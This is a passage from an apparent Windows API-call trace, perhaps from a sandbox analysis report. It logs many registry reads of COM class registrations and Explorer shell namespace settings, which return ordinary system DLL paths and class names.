pcbData=0x5fadb64*=0x4) returned 0x2 [0271.622] StrCmpIW (psz1="StorageDelegateSuppressionPolicy", psz2="DelegateExecute") returned 1 [0271.622] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UsersFiles\\NameSpace\\DelegateFolders", lpValue="StorageDelegateSuppressionPolicy", dwFlags=0x2, pdwType=0x0, pvData=0x5fad5d0, pcbData=0x5fad5b0*=0x4e | out: pdwType=0x0, pvData=0x5fad5d0, pcbData=0x5fad5b0*=0x4e) returned 0x0 [0271.622] StrCmpIW (psz1="StorageDelegate", psz2="DelegateExecute") returned 1 [0271.622] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UsersFiles\\NameSpace\\DelegateFolders", lpValue="StorageDelegate", dwFlags=0x2, pdwType=0x0, pvData=0x5fad620, pcbData=0x5fad5b0*=0x4e | out: pdwType=0x0, pvData=0x5fad620, pcbData=0x5fad5b0*=0x4e) returned 0x0 [0271.623] RegGetValueW (in: hkey=0xf3a, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5fab930, pcbData=0x5fab878*=0xc8 | out: pdwType=0x0, pvData=0x5fab930, pcbData=0x5fab878*=0xc8) returned 0x2 [0271.623] RegGetValueW (in: hkey=0xf3a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fab780, pvData=0x0, pcbData=0x5fab7d8*=0x0 | out: pdwType=0x5fab780*=0x1, pvData=0x0, pcbData=0x5fab7d8*=0x34) returned 0x0 [0271.623] RegGetValueW (in: hkey=0xf3a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fab780, pvData=0xd37c6f0, pcbData=0x5fab7d8*=0x34 | out: pdwType=0x5fab780*=0x1, pvData="Shell File System Folder", pcbData=0x5fab7d8*=0x32) returned 0x0 [0271.623] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.623] RegGetValueW (in: hkey=0xf32, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x5fab6d0, pvData=0x0, pcbData=0x5fab728*=0x0 | out: pdwType=0x5fab6d0*=0x0, pvData=0x0, pcbData=0x5fab728*=0x0) returned 0x2 [0271.623] RegGetValueW (in: hkey=0xf32, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fab710, pvData=0x0, pcbData=0x5fab768*=0x0 | out: pdwType=0x5fab710*=0x1, pvData=0x0, pcbData=0x5fab768*=0x54) returned 0x0 [0271.623] RegGetValueW (in: hkey=0xf32, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fab710, pvData=0x442f690, pcbData=0x5fab768*=0x54 | out: pdwType=0x5fab710*=0x1, pvData="C:\\Windows\\system32\\Windows.Storage.dll", pcbData=0x5fab768*=0x54) returned 0x0 [0271.623] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.623] RegGetValueW (in: hkey=0xf32, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x5fab6c0, pvData=0x5fab6e0, pcbData=0x5fab6a8*=0x3c | out: pdwType=0x5fab6c0*=0x1, pvData="Both", pcbData=0x5fab6a8*=0xa) returned 0x0 [0271.623] RegGetValueW (in: hkey=0xf3a, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5fab730, pvData=0x0, pcbData=0x5fab788*=0x0 | out: pdwType=0x5fab730*=0x0, pvData=0x0, pcbData=0x5fab788*=0x0) returned 0x2 [0271.624] RegGetValueW (in: hkey=0xf3a, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5fab730, pvData=0x0, pcbData=0x5fab788*=0x0 | out: pdwType=0x5fab730*=0x0, pvData=0x0, pcbData=0x5fab788*=0x0) returned 0x2 [0271.630] StrCmpIW (psz1="UIStatus", psz2="DelegateExecute") returned 1 [0271.630] RegGetValueW (in: hkey=0xf38, lpSubKey=0x0, lpValue="UIStatus", dwFlags=0x10, pdwType=0x0, pvData=0x5faec34, pcbData=0x5fae9b0*=0x4 | out: pdwType=0x0, pvData=0x5faec34, pcbData=0x5fae9b0*=0x4) returned 0x0 [0271.630] StrCmpIW (psz1="OnlyMember", psz2="DelegateExecute") returned 1 [0271.630] RegGetValueW (in: hkey=0xf38, lpSubKey=0x0, lpValue="OnlyMember", dwFlags=0x10, pdwType=0x0, pvData=0x5faed98, pcbData=0x5fae9b0*=0x4 | out: pdwType=0x0, pvData=0x5faed98, pcbData=0x5fae9b0*=0x4) returned 0x0 [0271.631] RegGetValueW (in: hkey=0x1096, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5fad240, pcbData=0x5fad188*=0xc8 | out: pdwType=0x0, pvData=0x5fad240, pcbData=0x5fad188*=0xc8) returned 0x2 [0271.631] RegGetValueW (in: hkey=0x1096, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad090, pvData=0x0, pcbData=0x5fad0e8*=0x0 | out: pdwType=0x5fad090*=0x1, pvData=0x0, pcbData=0x5fad0e8*=0x12) returned 0x0 [0271.632] RegGetValueW (in: hkey=0x1096, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad090, pvData=0xd31e870, pcbData=0x5fad0e8*=0x12 | out: pdwType=0x5fad090*=0x1, pvData="This PC", pcbData=0x5fad0e8*=0x10) returned 0x0 [0271.632] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.632] RegGetValueW (in: hkey=0x8ee, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x5facfe0, pvData=0x0, pcbData=0x5fad038*=0x0 | out: pdwType=0x5facfe0*=0x0, pvData=0x0, pcbData=0x5fad038*=0x0) returned 0x2 [0271.632] RegGetValueW (in: hkey=0x8ee, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad020, pvData=0x0, pcbData=0x5fad078*=0x0 | out: pdwType=0x5fad020*=0x1, pvData=0x0, pcbData=0x5fad078*=0x54) returned 0x0 [0271.632] RegGetValueW (in: hkey=0x8ee, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad020, pvData=0x442fc30, pcbData=0x5fad078*=0x54 | out: pdwType=0x5fad020*=0x1, pvData="C:\\Windows\\system32\\windows.storage.dll", pcbData=0x5fad078*=0x54) returned 0x0 [0271.632] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.632] RegGetValueW (in: hkey=0x8ee, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x5facfd0, pvData=0x5facff0, pcbData=0x5facfb8*=0x3c | out: pdwType=0x5facfd0*=0x1, pvData="Apartment", pcbData=0x5facfb8*=0x14) returned 0x0 [0271.632] RegGetValueW (in: hkey=0x1096, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5fad040, pvData=0x0, pcbData=0x5fad098*=0x0 | out: pdwType=0x5fad040*=0x0, pvData=0x0, pcbData=0x5fad098*=0x0) returned 0x2 [0271.632] RegGetValueW (in: hkey=0x1096, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5fad040, pvData=0x0, pcbData=0x5fad098*=0x0 | out: pdwType=0x5fad040*=0x0, pvData=0x0, pcbData=0x5fad098*=0x0) returned 0x2 [0271.632] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.633] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x5fad250, pvData=0x5fad258, pcbData=0x5fad254*=0x4 | out: pdwType=0x5fad250*=0x0, pvData=0x5fad258, pcbData=0x5fad254*=0x4) returned 0x2 [0271.633] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.633] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x5fad250, pvData=0x5fad258, pcbData=0x5fad254*=0x4 | out: pdwType=0x5fad250*=0x0, pvData=0x5fad258, pcbData=0x5fad254*=0x4) returned 0x2 [0271.633] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.633] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableDrives", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x5fae2e0, pvData=0x5fae2e8, pcbData=0x5fae2e4*=0x4 | out: pdwType=0x5fae2e0*=0x0, pvData=0x5fae2e8, pcbData=0x5fae2e4*=0x4) returned 0x2 [0271.633] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.633] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableDrives", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x5fae2e0, pvData=0x5fae2e8, pcbData=0x5fae2e4*=0x4 | out: pdwType=0x5fae2e0*=0x0, pvData=0x5fae2e8, pcbData=0x5fae2e4*=0x4) returned 0x2 [0271.633] StrCmpIW (psz1="FilterMask", psz2="DelegateExecute") returned 1 [0271.633] RegGetValueW (in: hkey=0x1094, lpSubKey="Storage", lpValue="FilterMask", dwFlags=0x10, pdwType=0x0, pvData=0x5faf2a8, pcbData=0x5faf2ac*=0x4 | out: pdwType=0x0, pvData=0x5faf2a8, pcbData=0x5faf2ac*=0x4) returned 0x2 [0271.634] StrCmpIW (psz1="NeverShowDrivesMask", psz2="DelegateExecute") returned 1 [0271.634] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", lpValue="NeverShowDrivesMask", dwFlags=0x10, pdwType=0x0, pvData=0xd205310, pcbData=0x5faf1d0*=0x4 | out: pdwType=0x0, pvData=0xd205310, pcbData=0x5faf1d0*=0x4) returned 0x2 [0271.635] StrCmpIW (psz1="HideDrivesWithNoMedia", psz2="DelegateExecute") returned 1 [0271.635] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", lpValue="HideDrivesWithNoMedia", dwFlags=0x10, pdwType=0x0, pvData=0x5faf1d4, pcbData=0x5faf1d0*=0x4 | out: pdwType=0x0, pvData=0x5faf1d4, pcbData=0x5faf1d0*=0x4) returned 0x2 [0271.635] RegGetValueW (in: hkey=0x90a, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5fad550, pcbData=0x5fad498*=0xc8 | out: pdwType=0x0, pvData=0x5fad550, pcbData=0x5fad498*=0xc8) returned 0x2 [0271.635] RegGetValueW (in: hkey=0x90a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad3a0, pvData=0x0, pcbData=0x5fad3f8*=0x0 | out: pdwType=0x5fad3a0*=0x1, pvData=0x0, pcbData=0x5fad3f8*=0x48) returned 0x0 [0271.636] RegGetValueW (in: hkey=0x90a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad3a0, pvData=0xd392680, pcbData=0x5fad3f8*=0x48 | out: pdwType=0x5fad3a0*=0x1, pvData="Property System Both Class Factory", pcbData=0x5fad3f8*=0x46) returned 0x0 [0271.636] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.636] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x5fad2f0, pvData=0x0, pcbData=0x5fad348*=0x0 | out: pdwType=0x5fad2f0*=0x0, pvData=0x0, pcbData=0x5fad348*=0x0) returned 0x2 [0271.636] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad330, pvData=0x0, pcbData=0x5fad388*=0x0 | out: pdwType=0x5fad330*=0x1, pvData=0x0, pcbData=0x5fad388*=0x44) returned 0x0 [0271.636] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fad330, pvData=0xd3920e0, pcbData=0x5fad388*=0x44 | out: pdwType=0x5fad330*=0x1, pvData="C:\\Windows\\system32\\propsys.dll", pcbData=0x5fad388*=0x44) returned 0x0 [0271.636] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.636] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x5fad2e0, pvData=0x5fad300, pcbData=0x5fad2c8*=0x3c | out: pdwType=0x5fad2e0*=0x1, pvData="Both", pcbData=0x5fad2c8*=0xa) returned 0x0 [0271.636] RegGetValueW (in: hkey=0x90a, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5fad350, pvData=0x0, pcbData=0x5fad3a8*=0x0 | out: pdwType=0x5fad350*=0x0, pvData=0x0, pcbData=0x5fad3a8*=0x0) returned 0x2 [0271.636] RegGetValueW (in: hkey=0x90a, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5fad350, pvData=0x0, pcbData=0x5fad3a8*=0x0 | out: pdwType=0x5fad350*=0x0, pvData=0x0, pcbData=0x5fad3a8*=0x0) returned 0x2 [0271.750] RegGetValueW (in: hkey=0x90a, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5faeda0, pcbData=0x5faece8*=0xc8 | out: pdwType=0x0, pvData=0x5faeda0, pcbData=0x5faece8*=0xc8) returned 0x2 [0271.750] RegGetValueW (in: hkey=0x90a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5faebf0, pvData=0x0, pcbData=0x5faec48*=0x0 | out: pdwType=0x5faebf0*=0x1, pvData=0x0, pcbData=0x5faec48*=0x2e) returned 0x0 [0271.750] RegGetValueW (in: hkey=0x90a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5faebf0, pvData=0xd37bdb0, pcbData=0x5faec48*=0x2e | out: pdwType=0x5faebf0*=0x1, pvData="Local Thumbnail Cache", pcbData=0x5faec48*=0x2c) returned 0x0 [0271.750] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.750] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x5faeb40, pvData=0x0, pcbData=0x5faeb98*=0x0 | out: pdwType=0x5faeb40*=0x0, pvData=0x0, pcbData=0x5faeb98*=0x0) returned 0x2 [0271.751] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5faeb80, pvData=0x0, pcbData=0x5faebd8*=0x0 | out: pdwType=0x5faeb80*=0x1, pvData=0x0, pcbData=0x5faebd8*=0x48) returned 0x0 [0271.751] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5faeb80, pvData=0xd392860, pcbData=0x5faebd8*=0x48 | out: pdwType=0x5faeb80*=0x1, pvData="C:\\Windows\\System32\\thumbcache.dll", pcbData=0x5faebd8*=0x46) returned 0x0 [0271.751] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.751] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x5faeb30, pvData=0x5faeb50, pcbData=0x5faeb18*=0x3c | out: pdwType=0x5faeb30*=0x1, pvData="Apartment", pcbData=0x5faeb18*=0x14) returned 0x0 [0271.751] RegGetValueW (in: hkey=0x90a, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5faeba0, pvData=0x0, pcbData=0x5faebf8*=0x0 | out: pdwType=0x5faeba0*=0x0, pvData=0x0, pcbData=0x5faebf8*=0x0) returned 0x2 [0271.751] RegGetValueW (in: hkey=0x90a, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5faeba0, pvData=0x0, pcbData=0x5faebf8*=0x0 | out: pdwType=0x5faeba0*=0x0, pvData=0x0, pcbData=0x5faebf8*=0x0) returned 0x2 [0271.777] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.777] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x5fad380, pvData=0x5fad388, pcbData=0x5fad384*=0x4 | out: pdwType=0x5fad380*=0x0, pvData=0x5fad388, pcbData=0x5fad384*=0x4) returned 0x2 [0271.778] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.778] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x5fad380, pvData=0x5fad388, pcbData=0x5fad384*=0x4 | out: pdwType=0x5fad380*=0x0, pvData=0x5fad388, pcbData=0x5fad384*=0x4) returned 0x2 [0271.778] RegGetValueW (in: hkey=0x10ba, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5fae740, pcbData=0x5fae688*=0xc8 | out: pdwType=0x0, pvData=0x5fae740, pcbData=0x5fae688*=0xc8) returned 0x2 [0271.778] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fae590, pvData=0x0, pcbData=0x5fae5e8*=0x0 | out: pdwType=0x5fae590*=0x1, pvData=0x0, pcbData=0x5fae5e8*=0x32) returned 0x0 [0271.778] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fae590, pvData=0xd37bb30, pcbData=0x5fae5e8*=0x32 | out: pdwType=0x5fae590*=0x1, pvData="Windows Search Platform", pcbData=0x5fae5e8*=0x30) returned 0x0 [0271.778] RegGetValueW (in: hkey=0x10ba, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5fae540, pvData=0x0, pcbData=0x5fae598*=0x0 | out: pdwType=0x5fae540*=0x0, pvData=0x0, pcbData=0x5fae598*=0x0) returned 0x2 [0271.778] RegGetValueW (in: hkey=0x10ba, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5fae540, pvData=0x0, pcbData=0x5fae598*=0x0 | out: pdwType=0x5fae540*=0x0, pvData=0x0, pcbData=0x5fae598*=0x0) returned 0x2 [0272.949] RegGetValueW (in: hkey=0xdd6, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x5fae730, pcbData=0x5fae678*=0xc8 | out: pdwType=0x0, pvData=0x5fae730, pcbData=0x5fae678*=0xc8) returned 0x2 [0272.949] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fae580, pvData=0x0, pcbData=0x5fae5d8*=0x0 | out: pdwType=0x5fae580*=0x1, pvData=0x0, pcbData=0x5fae5d8*=0x32) returned 0x0 [0272.949] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x5fae580, pvData=0xd37c170, pcbData=0x5fae5d8*=0x32 | out: pdwType=0x5fae580*=0x1, pvData="Windows Search Platform", pcbData=0x5fae5d8*=0x30) returned 0x0 [0272.949] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x5fae530, pvData=0x0, pcbData=0x5fae588*=0x0 | out: pdwType=0x5fae530*=0x0, pvData=0x0, pcbData=0x5fae588*=0x0) returned 0x2 [0272.950] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x5fae530, pvData=0x0, pcbData=0x5fae588*=0x0 | out: pdwType=0x5fae530*=0x0, pvData=0x0, pcbData=0x5fae588*=0x0) returned 0x2 Thread: id = 70 os_tid = 0x900 Thread: id = 71 os_tid = 0x8d4 Thread: id = 72 os_tid = 0x8cc [0245.325] RegGetValueW (in: hkey=0xb3e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x48de740, pcbData=0x48de688*=0xc8 | out: pdwType=0x0, pvData=0x48de740, pcbData=0x48de688*=0xc8) returned 0x2 [0245.325] RegGetValueW (in: hkey=0xb3e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x48de590, pvData=0x0, pcbData=0x48de5e8*=0x0 | out: pdwType=0x48de590*=0x1, pvData=0x0, pcbData=0x48de5e8*=0x44) returned 0x0 [0245.325] RegGetValueW (in: hkey=0xb3e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x48de590, pvData=0xd1c0680, pcbData=0x48de5e8*=0x44 | out: pdwType=0x48de590*=0x1, pvData="ShellItem Shell Namespace helper", pcbData=0x48de5e8*=0x42) returned 0x0 [0245.325] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0245.325] RegGetValueW (in: hkey=0xb02, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x48de4e0, pvData=0x0, pcbData=0x48de538*=0x0 | out: pdwType=0x48de4e0*=0x0, pvData=0x0, pcbData=0x48de538*=0x0) returned 0x2 [0245.325] RegGetValueW (in: hkey=0xb02, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x48de520, pvData=0x0, pcbData=0x48de578*=0x0 | out: pdwType=0x48de520*=0x1, pvData=0x0, pcbData=0x48de578*=0x54) returned 0x0 [0245.325] RegGetValueW (in: hkey=0xb02, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x48de520, pvData=0x5d031d0, pcbData=0x48de578*=0x54 | out: pdwType=0x48de520*=0x1, pvData="C:\\Windows\\system32\\windows.storage.dll", pcbData=0x48de578*=0x54) returned 0x0 [0245.325] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0245.325] RegGetValueW (in: hkey=0xb02, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x48de4d0, pvData=0x48de4f0, pcbData=0x48de4b8*=0x3c | out: pdwType=0x48de4d0*=0x1, pvData="Both", pcbData=0x48de4b8*=0xa) returned 0x0 [0245.325] RegGetValueW (in: hkey=0xb3e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x48de540, pvData=0x0, pcbData=0x48de598*=0x0 | out: pdwType=0x48de540*=0x0, pvData=0x0, pcbData=0x48de598*=0x0) returned 0x2 [0245.326] RegGetValueW (in: hkey=0xb3e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x48de540, pvData=0x0, pcbData=0x48de598*=0x0 | out: pdwType=0x48de540*=0x0, pvData=0x0, pcbData=0x48de598*=0x0) returned 0x2 [0271.788] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.788] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x48dea20, pvData=0x48dea28, pcbData=0x48dea24*=0x4 | out: pdwType=0x48dea20*=0x0, pvData=0x48dea28, pcbData=0x48dea24*=0x4) returned 0x2 [0271.788] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.788] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x48dea20, pvData=0x48dea28, pcbData=0x48dea24*=0x4 | out: pdwType=0x48dea20*=0x4, pvData=0x48dea28*=0x1, pcbData=0x48dea24*=0x4) returned 0x0 [0271.788] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.788] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x48dcef0, pvData=0x48dcef8, pcbData=0x48dcef4*=0x4 | out: pdwType=0x48dcef0*=0x0, pvData=0x48dcef8, pcbData=0x48dcef4*=0x4) returned 0x2 [0271.788] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.788] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x48dcef0, pvData=0x48dcef8, pcbData=0x48dcef4*=0x4 | out: pdwType=0x48dcef0*=0x0, pvData=0x48dcef8, pcbData=0x48dcef4*=0x4) returned 0x2 Thread: id = 73 os_tid = 0x8c8 Thread: id = 74 os_tid = 0x8c0 [0271.781] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.781] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x465ecc0, pvData=0x465ecc8, pcbData=0x465ecc4*=0x4 | out: pdwType=0x465ecc0*=0x0, pvData=0x465ecc8, pcbData=0x465ecc4*=0x4) returned 0x2 [0271.781] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.781] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x465ecc0, pvData=0x465ecc8, pcbData=0x465ecc4*=0x4 | out: pdwType=0x465ecc0*=0x4, pvData=0x465ecc8*=0x1, pcbData=0x465ecc4*=0x4) returned 0x0 [0271.782] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.782] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x465d1a0, pvData=0x465d1a8, pcbData=0x465d1a4*=0x4 | out: pdwType=0x465d1a0*=0x0, pvData=0x465d1a8, pcbData=0x465d1a4*=0x4) returned 0x2 [0271.782] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.782] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x465d1a0, pvData=0x465d1a8, pcbData=0x465d1a4*=0x4 | out: pdwType=0x465d1a0*=0x0, pvData=0x465d1a8, pcbData=0x465d1a4*=0x4) returned 0x2 Thread: id = 75 os_tid = 0x8bc Thread: id = 76 os_tid = 0x8b8 Thread: id = 77 os_tid = 0x8b0 [0248.483] RegGetValueW (in: hkey=0x139e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x55ad1f0, pcbData=0x55ad138*=0xc8 | out: pdwType=0x0, pvData=0x55ad1f0, pcbData=0x55ad138*=0xc8) returned 0x2 [0248.483] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ad040, pvData=0x0, pcbData=0x55ad098*=0x0 | out: pdwType=0x55ad040*=0x1, pvData=0x0, pcbData=0x55ad098*=0x22) returned 0x0 [0248.483] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ad040, pvData=0x5d80050, pcbData=0x55ad098*=0x22 | out: pdwType=0x55ad040*=0x1, pvData="Immersive Shell", pcbData=0x55ad098*=0x20) returned 0x0 [0248.483] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x55acff0, pvData=0x0, pcbData=0x55ad048*=0x0 | out: pdwType=0x55acff0*=0x0, pvData=0x0, pcbData=0x55ad048*=0x0) returned 0x2 [0248.483] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x55acff0, pvData=0x0, pcbData=0x55ad048*=0x0 | out: pdwType=0x55acff0*=0x0, pvData=0x0, pcbData=0x55ad048*=0x0) returned 0x2 [0248.494] RegGetValueW (in: hkey=0x139e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x55ac8b0, pcbData=0x55ac7f8*=0xc8 | out: pdwType=0x0, pvData=0x55ac8b0, pcbData=0x55ac7f8*=0xc8) returned 0x2 [0248.494] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ac700, pvData=0x0, pcbData=0x55ac758*=0x0 | out: 